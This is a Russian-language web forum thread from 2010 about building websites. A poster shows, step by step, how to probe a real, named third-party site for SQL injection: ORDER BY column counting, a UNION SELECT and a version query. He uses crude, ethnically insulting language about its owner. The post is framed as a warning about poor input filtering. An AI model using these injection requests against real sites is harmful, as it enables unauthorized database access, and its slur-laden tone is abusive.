Тема: Все Про Создание Сайтов
Показать сообщение отдельно
Артем
Аватар для Артем
Сообщения: 2,400
Регистрация: 02.04.2005
Старый пост, нажмите что бы добавить к себе блог 20 апреля 2010, 12:25
  #213 (ПС)
-Цитата от Bubble boy Посмотреть сообщение
-Цитата от Артем Посмотреть сообщение
а вообще допустим вот херовый пример плоховй фильтрации, допустим ты админ этго сайта и написал этот скрипт:

http://www.richardsmodels.com/index2.php?catid=2
всё вроде чотко, фотки хуётки... но не тут то было, зходит какой нибудь артём и смотрит, ага вот ты пидор пиндоский, надо ка тебя назать за то что ты не русский, и делает запрос в БД, следующим образом:

http://www.richardsmodels.com/index2.php?catid=2+order+b...000000+--+
смоютрит, ага
-
Unknown column '10000000000000' in 'order clause'
мало того что ты пиндос, но ты еще и криворукий кодер, и исходя из ответа базы, подбирает принтабельное количество колонок

http://www.richardsmodels.com/index2.php?catid=2+order+by+5+--+
и смотрит артем что и пяти колонк нету, ну думает, довай четыре
http://www.richardsmodels.com/index2.php?catid=2+order+by+4+--+
АГА! Артем сообразил что у тебя 4 колонки, и выполняет запрос:
http://www.richardsmodels.com/index2.php?catid=-1+union+...,2,3,4+--+
и видит артем что у тебя 2 и 3 колонки принтабельны, артем не долго думав, решает узнать, а какая же тут версию мюскл, и
http://www.richardsmodels.com/index2.php?catid=-1+union+...(),3,4+--+
и видит версию 4.1.20, немного огорчившесь, и совсем обленившись брутить, а кроме как брутить сделать мало что возможно, была бы версию мюскл хотя бы от 5 и выше, то было бы все в разы проще, и он решает покинуть этот поршивый сайт, хотя его взломать как нехуй делать, вот только кому он нужен

Добавлено через 1 минуту 38 секунд
-Цитата от Bubble boy Посмотреть сообщение
да вот например простенький сайтик есть:
легко он ломается?
Код:
<?php 
include ("blocks/bd.php"); /*Соединяемся с базой*/
$result = mysql_query("SELECT title,meta_d,meta_k,text FROM settings WHERE page='index'",$db);
$myrow = mysql_fetch_array($result); 
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="description" content="<?php echo $myrow['meta_d']; ?> ">
<meta name="keywords" content="<?php echo $myrow['meta_k']; ?> ">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title><?php echo $myrow['title']; ?></title>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="690" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" class="main_border">
<!--Подключаем шапку сайта-->
<? include("blocks/header.php");   ?> 
  <tr>
    <td><table width="690" border="0" cellspacing="0" cellpadding="0">
      <tr>
<!--Подключаем левый блок сайта-->
<? include ("blocks/lefttd.php");  ?>      
        <td valign="top">
        <?php echo $myrow['text']; ?>       
        </td>
      </tr>
    </table></td>
  </tr>
<!--Подключаем нижний графический элемент-->  
<?  include ("blocks/footer.php");        ?>  
</table>
</body>
</html>
дык тут и кода то нихуя нету, вытащить из бд пару фраз и подцепить шапку и низ.... не парься
ахуетьу меня походу тоже такой прикол будет



а вообще можно прописать что-то типа : если после catid= вписать левую хуету, то надо выводить index.php?
не очкуй славик, почитай про фильтрацию и всё будет путём, если что пиши поможем

offline
Ответить с цитированием